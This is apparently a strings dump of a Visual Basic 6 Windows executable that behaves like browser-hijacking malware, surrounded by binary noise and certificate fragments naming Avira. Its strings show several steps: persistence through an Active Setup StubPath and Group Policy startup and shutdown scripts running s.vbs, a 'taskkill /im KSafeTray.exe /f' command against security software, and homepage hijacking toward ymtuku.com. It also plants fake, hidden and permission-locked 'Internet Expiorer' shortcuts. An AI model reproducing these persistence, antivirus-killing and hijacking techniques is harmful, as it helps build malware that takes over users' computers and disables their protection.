!This program cannot be run in DOS mode.
`.data
MSVBVM60.DLL
jIs1hIsf
GsbrIs
HswUGs
hGs)uGs
FsObFs
Hs*aHs
FsYUGs
Es$FGs
gGsfLGs
GsDRFsk
Es];Fs~
FsEjGsZ]Fs
FstLGs
HstjGs-
Gs0jGs
56gejkk
6fekkllll
5fgkllea
0'%,5gjljb
0*&.5gnm
&0*'76gup
;00'.7gty
'0*17gw|
&x0-7ow|
0x/87vy
;y1x.s
22222222222222223
?UVMAQ
444444444444444 9
?VVMA[
ddddddddddddd2(
@VVML]
iihihihihih2(
iikiikikh <
!kkkklkh�
"lllk2+
DUSVTD
^MSV`T
}KTMHOS
_\[XW`MHHO
`TMHEFFH
CCCHSU
+0000000000/"
SUUUUUUUU1
h[[[[[[U
u]]]]U'
b �P
cAAAAA?
eGGG@\
mgkhp:-/'7
On Error Resume Next
A = "{A0XC6A98-A14C-J35H-46UD-F5AR862J2AH5}"
R = "Software\Microsoft\Active Setup\Installed Components\"
CreateObject("Wscript.Shell").Regwrite "HKEY_LOCAL_MACHINE\"
R � A & "\StubPath", "file:\\c:\sys.exe", "REG_SZ"
CreateObject("Wscript.Shell").RegDelete "HKEY_CURRENT_USER\" & R & A & "\"
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Shutdown]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Shutdown\0]
"GPO-ID"="LocalGPO"
"SOM-ID"="Local"
"FileSysPath"="C:\\WINDOWS\\System32\\GroupPolicy\\Machine"
"DisplayName"="Local Group Policy"
"GPOName"="Local Group Policy"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Shutdown\0\0]
"Script"="C:\\WINDOWS\\s.vbs"
"Parameters"=""
"ExecTime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup\0]
"GPO-ID"="LocalGPO"
"SOM-ID"="Local"
"FileSysPath"="C:\\WINDOWS\\System32\\GroupPolicy\\Machine"
"DisplayName"="Local Group Policy"
"GPOName"="Local Group Policy"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup\0\0]
"Script"="C:\\WINDOWS\\s.vbs"
"Parameters"=""
"ExecTime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
shouye
�vb6chs.dll
ZY0o8
shouye
C:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
kernel32
CreateToolhelp32Snapshot
Process32First
Process32Next
ExitProcess
GetExitCodeProcess
shell32.dll
ShellExecuteA
MoveFileExA
user32
FindWindowA
PostMessageA
exitproc
shell360
shellTT
shellaoyou
shellgoogle
guo360
__vbaFreeObjList
VBA6.DLL
__vbaPrintFile
__vbaAryDestruct
__vbaFileClose
__vbaFPInt
__vbaPut4
__vbaI2Var
__vbaVarAdd
__vbaGenerateBoundsError
__vbaGet4
__vbaFileOpen
__vbaAryConstruct2
__vbaStrVarVal
__vbaVarCat
__vbaStrVarMove
__vbaNameFile
__vbaObjVar
__vbaLateMemCall
__vbaVarLateMemSt
__vbaVarCopy
__vbaVarLateMemCallLd
__vbaVarSetVar
__vbaEnd
__vbaStrToAnsi
__vbaStrCat
__vbaVarDup
__vbaObjSet
__vbaFreeObj
__vbaHresultCheckObj
__vbaNew2
__vbaOnError
__vbaErrorOverflow
__vbaFreeStr
__vbaFreeVar
__vbaFreeVarList
__vbaFreeStrList
__vbaLsetFixstr
__vbaStrFixstr
__vbaInStr
__vbaI4Var
__vbaVarMove
__vbaStrCmp
__vbaStrMove
__vbaBoolVarNull
__vbaRecAnsiToUni
__vbaRecUniToAnsi
__vbaSetSystemError
__vbaStrCopy
exefile
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaVarMove
__vbaFreeVar
__vbaStrVarMove
__vbaFreeVarList
__vbaEnd
_adj_fdiv_m64
__vbaPut4
__vbaFreeObjList
_adj_fprem1
__vbaRecAnsiToUni
__vbaStrCat
__vbaLsetFixstr
__vbaSetSystemError
__vbaHresultCheckObj
__vbaNameFile
_adj_fdiv_m32
__vbaAryDestruct
__vbaOnError
__vbaObjSet
_adj_fdiv_m16i
_adj_fdivr_m16i
__vbaStrFixstr
__vbaBoolVarNull
_CIsin
__vbaChkstk
__vbaFileClose
EVENT_SINK_AddRef
__vbaGenerateBoundsError
__vbaStrCmp
__vbaAryConstruct2
__vbaGet4
__vbaObjVar
DllFunctionCall
__vbaVarLateMemSt
_adj_fpatan
__vbaRecUniToAnsi
EVENT_SINK_Release
_CIsqrt
EVENT_SINK_QueryInterface
__vbaExceptHandler
__vbaPrintFile
_adj_fprem
_adj_fdivr_m64
__vbaFPException
__vbaStrVarVal
__vbaVarCat
__vbaI2Var
_CIlog
__vbaErrorOverflow
__vbaFileOpen
__vbaInStr
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaFreeStrList
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarSetVar
__vbaI4Var
__vbaVarAdd
__vbaLateMemCall
__vbaVarDup
__vbaStrToAnsi
__vbaVarLateMemCallLd
__vbaVarCopy
_CIatan
__vbaStrMove
_allmul
_CItan
__vbaFPInt
_CIexp
__vbaFreeStr
__vbaFreeObj
b �P
cAAAAA?
eGGG@\
mgkhp:-/'7
+0000000000/"
SUUUUUUUU1
h[[[[[[U
u]]]]U'
56gejkk
6fekkllll
5fgkllea
0'%,5gjljb
0*&.5gnm
&0*'76gup
;00'.7gty
'0*17gw|
&x0-7ow|
0x/87vy
;y1x.s
22222222222222223
?UVMAQ
444444444444444 9
?VVMA[
ddddddddddddd2(
@VVML]
iihihihihih2(
iikiikikh <
!kkkklkh�
"lllk2+
DUSVTD
^MSV`T
}KTMHOS
_\[XW`MHHO
`TMHEFFH
CCCHSU
VeriSign, Inc.1+0)
"VeriSign Time Stamping Services CA0
070615000000Z
120614235959Z0\1
VeriSign, Inc.1402
+VeriSign Time Stamping Services Signer - G20
6^bMRQ4q
JcEG.k
http://ocsp.verisign.com0
"http://crl.verisign.com/tss-ca.crl0
TSA1-20
Western Cape1
Durbanville1
Thawte1
Thawte Certification1�0
Thawte Timestamping CA0
031204000000Z
131203235959Z0S1
VeriSign, Inc.1+0)
"VeriSign Time Stamping Services CA0
http://ocsp.verisign.com0
0http://crl.verisign.com/ThawteTimestampingCA.crl0
TSA2048-1-530
?7!Op1
VeriSign, Inc.1705
.Class 3 Public Primary Certification Authority0
040716000000Z
140715235959Z0
VeriSign, Inc.1�0
VeriSign Trust Network1;09
2Terms of use at https://www.verisign.com/rpa (c)041.0,
%VeriSign Class 3 Code Signing 2004 CA0
https://www.verisign.com/rpa01
http://crl.verisign.com/pca3.crl0
Class3CA2048-1-430
==d6|h
VeriSign, Inc.1705
.Class 3 Public Primary Certification Authority
VeriSign, Inc.1�0
VeriSign Trust Network1;09
2Terms of use at https://www.verisign.com/rpa (c)041.0,
%VeriSign Class 3 Code Signing 2004 CA0
070523000000Z
090606235959Z0
Baden-Wuerttemberg1
Tettnang1
Avira GmbH1>0<
5Digital ID Class 3 - Microsoft Software Validation v21
Avira GmbH0
/http://CSC3-2004-crl.verisign.com/CSC3-2004.crl0D
https://www.verisign.com/rpa0
http://ocsp.verisign.com0?
3http://CSC3-2004-aia.verisign.com/CSC3-2004-aia.cer0�
==d6|h
VeriSign, Inc.1�0
VeriSign Trust Network1;09
2Terms of use at https://www.verisign.com/rpa (c)041.0,
%VeriSign Class 3 Code Signing 2004 CA
http://www.avira.com0
VeriSign, Inc.1+0)
"VeriSign Time Stamping Services CA
080207082535Z0�
--6ea82cfe88bbbac70446882379349589--
A*\AC:\Documents and Settings\Administrator\
360tray.exe
http://dhku.com
taskkill.exe /im KSafeTray.exe /f
c:\sys.exe
C:\WINDOWS\sys.exe
cmd /c del
RavMonD.exe
C:\Documents and Settings\All Users\
\windows.exe
C:\Program Files\Internet Explorer\iexplore.exe http://www.ymtuku.com/xg/?tan
Wscript.Network
UserName
Wscript.shell
C:\Documents and Settings\All Users\
\Internet Expiorer.lnk
CreateShortcut
Arguments
file:\\C:\sys.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
TargetPath
ALT+CTRL+C
Hotkey
C:\Documents and Settings\All Users\
C:\Documents and Settings\
\Application Data\Microsoft\Internet Explorer\Quick Launch
\Application Data\Microsoft\Internet Explorer\Quick Launc
wscript.shell
cmd /c attrib +h
"C:\Documents and Settings\All Users\
\Internet Explorer.lnk"
"C:\Documents and Settings\
\Internet Explorer.lnk"
RegWrite
\Application Data\Microsoft\Internet Explorer\Quick Launch\
Internet Explorer
\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Explorer.lnk"
\Internet Explorer.lnk"
attrib
Wscript.Shell
"C:\Documents and Settings\All Users\
\Internet Expiorer.lnk"
echo Y| cacls
/P users:R
\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Expiorer.lnk"
C:\Documents and Settings\All Users\
3.lnk
"C:\Documents and Settings\All Users\
\Internet Expiorer.lnk"
Scripting.FileSystemObject
C:\WINDOWS\system32\ie.bat
CreateTextFile
WriteLine
scripting.filesystemobject
FileExists
WScript.Shell
TT.lnk
C:\Documents and settings\
C:\Documents and Settings\All Users\
{A0XC6A98-A14C-J35H-46UD-F5AR862J2AH5}
Software\Microsoft\Active Setup\Installed Components\
HKEY_LOCAL_MACHINE\
\StubPath
REG_SZ
HKEY_CURRENT_USER\
RegDelete
"C:\WINDOWS\sys.exe"
"c:\sys.exe"
"C:\Documents and Settings\All Users\
\windows.exe"
"C:\Documents and Settings\All Users\
C:\WINDOWS\system32\qx.bat
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage
"C:\Documents and Settings\All Users\
3.lnk"
C:\WINDOWS\s.vbs
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel\{871C5380-42A0-1069-A2EA-08002B30309D}
\Application Data\Microsoft\Internet Explorer\Quick Launch\360
3.lnk"
C:\WINDOWS\system32\GroupPolicy\gpt.ini
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu\{871C5380-42A0-1069-A2EA-08002B30309D}
Progman
Program Manager
3 .lnk
"C:\Documents and Settings\All Users\
3.lnk"
"C:\Documents and Settings\All Users\
3\360
3.lnk"
"C:\Documents and Settings\All Users\
3 .lnk"
\Application Data\Microsoft\Internet Explorer\Quick Launch\360
3 .lnk"
C:\WINDOWS\kaiguan.reg
"C:\Documents and Settings\All Users\
3 .lnk"
C:\WINDOWS\system32\360.bat
TT .lnk
"C:\Documents and Settings\All Users\
TT.lnk"
TT.lnk"
"C:\Documents and Settings\All Users\
2 .lnk"
\Application Data\Microsoft\Internet Explorer\Quick Launch\
TT.lnk"
TT.lnk"
TT.lnk"
attrib
"C:\Documents and Settings\All Users\
TT .lnk"
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts
\Application Data\Microsoft\Internet Explorer\Quick Launch\
TT .lnk"
"C:\Documents and Settings\All Users\
TT .lnk"
C:\WINDOWS\system32\tt.bat
2 .lnk
"C:\Documents and Settings\All Users\
2.lnk"
[Shutdown]
\Application Data\Microsoft\Internet Explorer\Quick Launch\
2.lnk"
"C:\Documents and Settings\All Users\
2.lnk"
"C:\Documents and Settings\All Users\
2.lnk"
C:\WINDOWS\system32\GroupPolicy\Machine
\Application Data\Microsoft\Internet Explorer\Quick Launch\
2 .lnk"
"C:\Documents and Settings\All Users\
2 .lnk"
C:\WINDOWS\system32\aoyou.bat
C:\WINDOWS\system32\GroupPolicy
\Application Data\Microsoft\Internet Explorer\Quick Launch\
"C:\Documents and Settings\All Users\
.lnk"
C:\Documents and Settings\All Users\
\Application Data\Microsoft\Internet Explorer\Quick Launch\
.lnk"
"C:\Documents and Settings\All Users\
.lnk"
C:\WINDOWS\system32\google.bat
C:\Windows
C:\Windows\
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Shutdown
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Scripts.ini
[Startup]
0CmdLine=C:\WINDOWS\s.vbs
0Parameters=
[General]
gPCMachineExtensionNames=[{42B5FAAE-6536-11D2-AE5A-0000F87571E3}{40B6664F-4972-11D1-A7CA-0000F87571E3}]
Version=2
regedit /s C:\WINDOWS\kaiguan.reg
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
080404B0
CompanyName
LegalCopyright
ProductName
FileVersion
ProductVersion
InternalName
OriginalFilename
<<<Obsolete>>
&AntiVir Workstatio
